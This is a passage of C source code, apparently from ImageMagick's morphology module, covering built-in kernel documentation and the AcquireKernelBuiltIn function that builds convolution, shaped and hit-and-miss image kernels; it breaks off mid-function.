% A ring of the values given that falls between the two radii.
% Defaults to a ring of approximataly 3 radius in a 7x7 kernel.
% This is the 'edge' pixels of the default "Disk" kernel,
% More specifically, "Ring" -> "Ring:2.5,3.5,1.0"
%
% Hit and Miss Kernels
%
% Peak:radius1,radius2
% Find any peak larger than the pixels the fall between the two radii.
% The default ring of pixels is as per "Ring".
% Edges
% Find flat orthogonal edges of a binary shape
% Corners
% Find 90 degree corners of a binary shape
% Diagonals:type
% A special kernel to thin the 'outside' of diagonals
% LineEnds:type
% Find end points of lines (for pruning a skeletion)
% Two types of lines ends (default to both) can be searched for
% Type 0: All line ends
% Type 1: single kernel for 4-conneected line ends
% Type 2: single kernel for simple line ends
% LineJunctions
% Find three line junctions (within a skeletion)
% Type 0: all line junctions
% Type 1: Y Junction kernel
% Type 2: Diagonal T Junction kernel
% Type 3: Orthogonal T Junction kernel
% Type 4: Diagonal X Junction kernel
% Type 5: Orthogonal + Junction kernel
% Ridges:type
% Find single pixel ridges or thin lines
% Type 1: Fine single pixel thick lines and ridges
% Type 2: Find two pixel thick lines and ridges
% ConvexHull
% Octagonal Thickening Kernel, to generate convex hulls of 45 degrees
% Skeleton:type
% Traditional skeleton generating kernels.
% Type 1: Tradional Skeleton kernel (4 connected skeleton)
% Type 2: HIPR2 Skeleton kernel (8 connected skeleton)
% Type 3: Thinning skeleton based on a ressearch paper by
% Dan S. Bloomberg (Default Type)
% ThinSE:type
% A huge variety of Thinning Kernels designed to preserve conectivity.
% many other kernel sets use these kernels as source definitions.
% Type numbers are 41-49, 81-89, 481, and 482 which are based on
% the super and sub notations used in the source research paper.
%
% Distance Measuring Kernels
%
% Different types of distance measuring methods, which are used with the
% a 'Distance' morphology method for generating a gradient based on
% distance from an edge of a binary shape, though there is a technique
% for handling a anti-aliased shape.
%
% See the 'Distance' Morphological Method, for information of how it is
% applied.
%
% Chebyshev:[{radius}][x{scale}[%!]]
% Chebyshev Distance (also known as Tchebychev or Chessboard distance)
% is a value of one to any neighbour, orthogonal or diagonal. One why
% of thinking of it is the number of squares a 'King' or 'Queen' in
% chess needs to traverse reach any other position on a chess board.
% It results in a 'square' like distance function, but one where
% diagonals are given a value that is closer than expected.
%
% Manhattan:[{radius}][x{scale}[%!]]
% Manhattan Distance (also known as Rectilinear, City Block, or the Taxi
% Cab distance metric), it is the distance needed when you can only
% travel in horizontal or vertical directions only. It is the
% distance a 'Rook' in chess would have to travel, and results in a
% diamond like distances, where diagonals are further than expected.
%
% Octagonal:[{radius}][x{scale}[%!]]
% An interleving of Manhatten and Chebyshev metrics producing an
% increasing octagonally shaped distance. Distances matches those of
% the "Octagon" shaped kernel of the same radius. The minimum radius
% and default is 2, producing a 5x5 kernel.
%
% Euclidean:[{radius}][x{scale}[%!]]
% Euclidean distance is the 'direct' or 'as the crow flys' distance.
% However by default the kernel size only has a radius of 1, which
% limits the distance to 'Knight' like moves, with only orthogonal and
% diagonal measurements being correct. As such for the default kernel
% you will get octagonal like distance function.
%
% However using a larger radius such as "Euclidean:4" you will get a
% much smoother distance gradient from the edge of the shape. Especially
% if the image is pre-processed to include any anti-aliasing pixels.
% Of course a larger kernel is slower to use, and not always needed.
%
% The first three Distance Measuring Kernels will only generate distances
% of exact multiples of {scale} in binary images. As such you can use a
% scale of 1 without loosing any information. However you also need some
% scaling when handling non-binary anti-aliased shapes.
%
% The "Euclidean" Distance Kernel however does generate a non-integer
% fractional results, and as such scaling is vital even for binary shapes.
%
*/
MagickExport KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
const GeometryInfo *args,ExceptionInfo *exception)
{
KernelInfo
*kernel;
register ssize_t
i;
register ssize_t
u,
v;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
/* Generate a new empty kernel if needed */
kernel=(KernelInfo *) NULL;
switch(type) {
case UndefinedKernel: /* These should not call this function */
case UserDefinedKernel:
assert("Should not call this function" != (char *) NULL);
break;
case LaplacianKernel: /* Named Descrete Convolution Kernels */
case SobelKernel: /* these are defined using other kernels */
case RobertsKernel:
case PrewittKernel:
case CompassKernel:
case KirschKernel:
case FreiChenKernel:
case EdgesKernel: /* Hit and Miss kernels */
case CornersKernel:
case DiagonalsKernel:
case LineEndsKernel:
case LineJunctionsKernel:
case RidgesKernel:
case ConvexHullKernel:
case SkeletonKernel:
case ThinSEKernel:
break; /* A pre-generated kernel is not needed */
#if 0
/* set to 1 to do a compile-time check that we haven't missed anything */
case UnityKernel:
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case BlurKernel:
case CometKernel:
case BinomialKernel:
case DiamondKernel:
case SquareKernel:
case RectangleKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
case RingKernel:
case PeaksKernel:
case ChebyshevKernel:
case ManhattanKernel:
case OctangonalKernel:
case EuclideanKernel:
#else
default:
#endif
/* Generate the base Kernel Structure */
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = type;
kernel->next = (KernelInfo *) NULL;
kernel->signature=MagickCoreSignature;
break;
}
switch(type) {
/*
Convolution Kernels
*/
case UnityKernel:
{
kernel->height = kernel->width = (size_t) 1;
kernel->x = kernel->y = (ssize_t) 0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(1,sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
kernel->maximum = kernel->values[0] = args->rho;
break;
}
break;
case GaussianKernel:
case DoGKernel:
case LoGKernel:
{ double
sigma = fabs(args->sigma),
sigma2 = fabs(args->xi),
A, B, R;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else if ( (type != DoGKernel) || (sigma >= sigma2) )
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma);
else
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma2);
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* WARNING: The following generates a 'sampled gaussian' kernel.
* What we really want is a 'discrete gaussian' kernel.
*
* How to do this is I don't know, but appears to be basied on the
* Error Function 'erf()' (intergral of a gaussian)
*/
if ( type == GaussianKernel || type == DoGKernel )
{ /* Calculate a Gaussian, OR positive half of a DoG */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
if ( type == DoGKernel )
{ /* Subtract a Negative Gaussian for "Difference of Gaussian" */
if ( sigma2 > MagickEpsilon )
{ sigma = sigma2; /* simplify loop expressions */
A = 1.0/(2.0*sigma*sigma);
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] -= exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
kernel->values[kernel->x+kernel->y*kernel->width] -= 1.0;
}
if ( type == LoGKernel )
{ /* Calculate a Laplacian of a Gaussian - Or Mexician Hat */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(MagickPI*sigma*sigma*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ R = ((double)(u*u+v*v))*A;
kernel->values[i] = (1-R)*exp(-R)*B;
}
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
/* Note the above kernels may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (> 0.1) the central value becomes larger than one, and thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 2D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
break;
}
case BlurKernel:
{ double
sigma = fabs(args->sigma),
alpha, beta;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else
kernel->width = GetOptimalKernelWidth1D(args->rho,sigma);
kernel->height = 1;
kernel->x = (ssize_t) (kernel->width-1)/2;
kernel->y = 0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
#if 1
#define KernelRank 3
/* Formula derived from GetBlurKernel() in "effect.c" (plus bug fix).
** It generates a gaussian 3 times the width, and compresses it into
** the expected range. This produces a closer normalization of the
** resulting kernel, especially for very low sigma values.
** As such while wierd it is prefered.
**
** I am told this method originally came from Photoshop.
**
** A properly normalized curve is generated (apart from edge clipping)
** even though we later normalize the result (for edge clipping)
** to allow the correct generation of a "Difference of Blurs".
*/
/* initialize */
v = (ssize_t) (kernel->width*KernelRank-1)/2; /* start/end points to fit range */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
/* Calculate a Positive 1D Gaussian */
if ( sigma > MagickEpsilon )
{ sigma *= KernelRank; /* simplify loop expressions */
alpha = 1.0/(2.0*sigma*sigma);
beta= (double) (1.0/(MagickSQ2PI*sigma ));
for ( u=-v; u <= v; u++) {
kernel->values[(u+v)/KernelRank] +=
exp(-((double)(u*u))*alpha)*beta;
}
}
else /* special case - generate a unity kernel */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
#else
/* Direct calculation without curve averaging
This is equivelent to a KernelRank of 1 */
/* Calculate a Positive Gaussian */
if ( sigma > MagickEpsilon )
{ alpha = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
beta = 1.0/(MagickSQ2PI*sigma);
for ( i=0, u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u))*alpha)*beta;
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
#endif
/* Note the above kernel may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (> 0.1) the central value becomes larger than one, as a
** result of not generating a actual 'discrete' kernel, and thus
** producing a very bright 'impulse'.
**
** Becuase of these two factors Normalization is required!
*/
/* Normalize the 1D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
/* rotate the 1D kernel by given angle */
RotateKernelInfo(kernel, args->xi );
break;
}
case CometKernel:
{ double
sigma = fabs(args->sigma),
A;
if ( args->rho < 1.0 )
kernel->width = (GetOptimalKernelWidth1D(args->rho,sigma)-1)/2+1;
else
kernel->width = (size_t)args->rho;
kernel->x = kernel->y = 0;
kernel->height = 1;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* A comet blur is half a 1D gaussian curve, so that the object is
** blurred in one direction only. This may not be quite the right
** curve to use so may change in the future. The function must be
** normalised after generation, which also resolves any clipping.
**
** As we are normalizing and not subtracting gaussians,
** there is no need for a divisor in the gaussian formula
**
** It is less comples
*/
if ( sigma > MagickEpsilon )
{
#if 1
#define KernelRank 3
v = (ssize_t) kernel->width*KernelRank; /* start/end points */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*sizeof(*kernel->values));
sigma *= KernelRank; /* simplify the loop expression */
A = 1.0/(2.0*sigma*sigma);
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( u=0; u < v; u++) {
kernel->values[u/KernelRank] +=
exp(-((double)(u*u))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
}
for (i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range += kernel->values[i];
#else
A = 1.0/(2.0*sigma*sigma); /* simplify the loop expression */
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range +=
kernel->values[i] = exp(-((double)(i*i))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
#endif
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
}
kernel->minimum = 0.0;
kernel->maximum = kernel->values[0];
kernel->negative_range = 0.0;
ScaleKernelInfo(kernel, 1.0, NormalizeValue); /* Normalize */
RotateKernelInfo(kernel, args->xi); /* Rotate by angle */
break;
}
case BinomialKernel:
{
size_t
order_f;
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
order_f = fact(kernel->width-1);
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values within diamond area to scale given */
for ( i=0, v=0; v < (ssize_t)kernel->height; v++)
{ size_t
alpha = order_f / ( fact((size_t) v) * fact(kernel->height-v-1) );
for ( u=0; u < (ssize_t)kernel->width; u++, i++)
kernel->positive_range += kernel->values[i] = (double)
(alpha * order_f / ( fact((size_t) u) * fact(kernel->height-u-1) ));
}
kernel->minimum = 1.0;
kernel->maximum = kernel->values[kernel->x+kernel->y*kernel->width];
kernel->negative_range = 0.0;
break;
}
/*
Convolution Kernels - Well Known Named Constant Kernels
*/
case LaplacianKernel:
{ switch ( (int) args->rho ) {
case 0:
default: /* laplacian square filter -- default */
kernel=ParseKernelArray("3: -1,-1,-1 -1,8,-1 -1,-1,-1");
break;
case 1: /* laplacian diamond filter */
kernel=ParseKernelArray("3: 0,-1,0 -1,4,-1 0,-1,0");
break;
case 2:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
break;
case 3:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 1,-2,1");
break;
case 5: /* a 5x5 laplacian */
kernel=ParseKernelArray(
"5: -4,-1,0,-1,-4 -1,2,3,2,-1 0,3,4,3,0 -1,2,3,2,-1 -4,-1,0,-1,-4");
break;
case 7: /* a 7x7 laplacian */
kernel=ParseKernelArray(
"7:-10,-5,-2,-1,-2,-5,-10 -5,0,3,4,3,0,-5 -2,3,6,7,6,3,-2 -1,4,7,8,7,4,-1 -2,3,6,7,6,3,-2 -5,0,3,4,3,0,-5 -10,-5,-2,-1,-2,-5,-10" );
break;
case 15: /* a 5x5 LoG (sigma approx 1.4) */
kernel=ParseKernelArray(
"5: 0,0,-1,0,0 0,-1,-2,-1,0 -1,-2,16,-2,-1 0,-1,-2,-1,0 0,0,-1,0,0");
break;
case 19: /* a 9x9 LoG (sigma approx 1.4) */
/* http://www.cscjournals.org/csc/manuscript/Journals/IJIP/volume3/Issue1/IJIP-15.pdf */
kernel=ParseKernelArray(
"9: 0,-1,-1,-2,-2,-2,-1,-1,0 -1,-2,-4,-5,-5,-5,-4,-2,-1 -1,-4,-5,-3,-0,-3,-5,-4,-1 -2,-5,-3,12,24,12,-3,-5,-2 -2,-5,-0,24,40,24,-0,-5,-2 -2,-5,-3,12,24,12,-3,-5,-2 -1,-4,-5,-3,-0,-3,-5,-4,-1 -1,-2,-4,-5,-5,-5,-4,-2,-1 0,-1,-1,-2,-2,-2,-1,-1,0");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
break;
}
case SobelKernel:
{ /* Simple Sobel Kernel */
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case RobertsKernel:
{
kernel=ParseKernelArray("3: 0,0,0 1,-1,0 0,0,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case PrewittKernel:
{
kernel=ParseKernelArray("3: 1,0,-1 1,0,-1 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case CompassKernel:
{
kernel=ParseKernelArray("3: 1,1,-1 1,-2,-1 1,1,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case KirschKernel:
{
kernel=ParseKernelArray("3: 5,-3,-3 5,0,-3 5,-3,-3");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case FreiChenKernel:
/* Direction is set to be left to right positive */
/* http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf -- RIGHT? */
/* http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf -- WRONG? */
{ switch ( (int) args->rho ) {
default:
case 0:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +(MagickRealType) MagickSQ2;
kernel->values[5] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
break;
case 2:
kernel=ParseKernelArray("3: 1,2,0 2,0,-2 0,-2,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = kernel->values[3]= +(MagickRealType) MagickSQ2;
kernel->values[5] = kernel->values[7]= -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 10:
{
kernel=AcquireKernelInfo("FreiChen:11;FreiChen:12;FreiChen:13;FreiChen:14;FreiChen:15;FreiChen:16;FreiChen:17;FreiChen:18;FreiChen:19",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
break;
}
case 1:
case 11:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +(MagickRealType) MagickSQ2;
kernel->values[5] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 12:
kernel=ParseKernelArray("3: 1,2,1 0,0,0 1,2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = +(MagickRealType) MagickSQ2;
kernel->values[7] = +(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 13:
kernel=ParseKernelArray("3: 2,-1,0 -1,0,1 0,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[0] = +(MagickRealType) MagickSQ2;
kernel->values[8] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 14:
kernel=ParseKernelArray("3: 0,1,-2 -1,0,1 2,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[2] = -(MagickRealType) MagickSQ2;
kernel->values[6] = +(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 15:
kernel=ParseKernelArray("3: 0,-1,0 1,0,1 0,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 16:
kernel=ParseKernelArray("3: 1,0,-1 0,0,0 -1,0,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 17:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 -1,-2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 18:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 19:
kernel=ParseKernelArray("3: 1,1,1 1,1,1 1,1,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/3.0, NoValue);
break;
}
if ( fabs(args->sigma) >= MagickEpsilon )
/* Rotate by correctly supplied 'angle' */
RotateKernelInfo(kernel, args->sigma);
else if ( args->rho > 30.0 || args->rho < -30.0 )
/* Rotate by out of bounds 'type' */
RotateKernelInfo(kernel, args->rho);
break;
}
/*
Boolean or Shaped Kernels
*/
case DiamondKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values within diamond area to scale given */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <= (long) kernel->x)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case SquareKernel:
case RectangleKernel:
{ double
scale;
if ( type == SquareKernel )
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = (size_t) (2*args->rho+1);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
scale = args->sigma;
}
else {
/* NOTE: user defaults set in "AcquireKernelInfo()" */
if ( args->rho < 1.0 || args->sigma < 1.0 )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->width = (size_t)args->rho;
kernel->height = (size_t)args->sigma;
if ( args->xi < 0.0 || args->xi > (double)kernel->width ||
args->psi < 0.0 || args->psi > (double)kernel->height )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->x = (ssize_t) args->xi;
kernel->y = (ssize_t) args->psi;
scale = 1.0;
}
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values to scale given */
u=(ssize_t) (kernel->width*kernel->height);
for ( i=0; i < u; i++)
kernel->values[i] = scale;
kernel->minimum = kernel->maximum = scale; /* a flat shape */
kernel->positive_range = scale*u;
break;
}
case OctagonKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <=
((long)kernel->x + (long)(kernel->x/2)) )
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case DiskKernel:
{
ssize_t
limit = (ssize_t)(args->rho*args->rho);
if (args->rho < 0.4) /* default radius approx 4.3 */
kernel->width = kernel->height = 9L, limit = 18L;
else
kernel->width = kernel->height = (size_t)fabs(args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ((u*u+v*v) <= limit)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case PlusKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axises to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == 0 || v == 0) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
case CrossKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axises to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == v || u == -v) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
/*
HitAndMiss Kernels
*/
case RingKernel:
case PeaksKernel:
{
ssize_t
limit1,
limit2,
scale;
if (args->rho < args->sigma)
{
kernel->width = ((size_t)args->sigma)*2+1;
limit1 = (ssize_t)(args->rho*args->rho);
limit2 = (ssize_t)(args->sigma*args->sigma);
}
else
{
kernel->width = ((size_t)args->rho)*2+1;
limit1 = (ssize_t)(args->sigma*args->sigma);
limit2 = (ssize_t)(args->rho*args->rho);
}
if ( limit2 <= 0 )
kernel->width = 7L, limit1 = 7L, limit2 = 11L;
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set a ring of points of 'scale' ( 0.0 for PeaksKernel ) */
scale = (ssize_t) (( type == PeaksKernel) ? 0.0 : args->xi);
for ( i=0, v= -kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ ssize_t radius=u*u+v*v;
if (limit1 < radius && radius <= limit2)
kernel->positive_range += kernel->values[i] = (double) scale;
else
kernel->values[i] = nan;
}
kernel->minimum = kernel->maximum = (double) scale;
if ( type == PeaksKernel ) {
/* set the central point in the middle */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
kernel->maximum = 1.0;
}
break;
}
case EdgesKernel:
{
kernel=AcquireKernelInfo("ThinSE:482",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandMirrorKernelInfo(kernel); /* mirror expansion of kernels */
break;
}
case CornersKernel:
{
kernel=AcquireKernelInfo("ThinSE:87",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
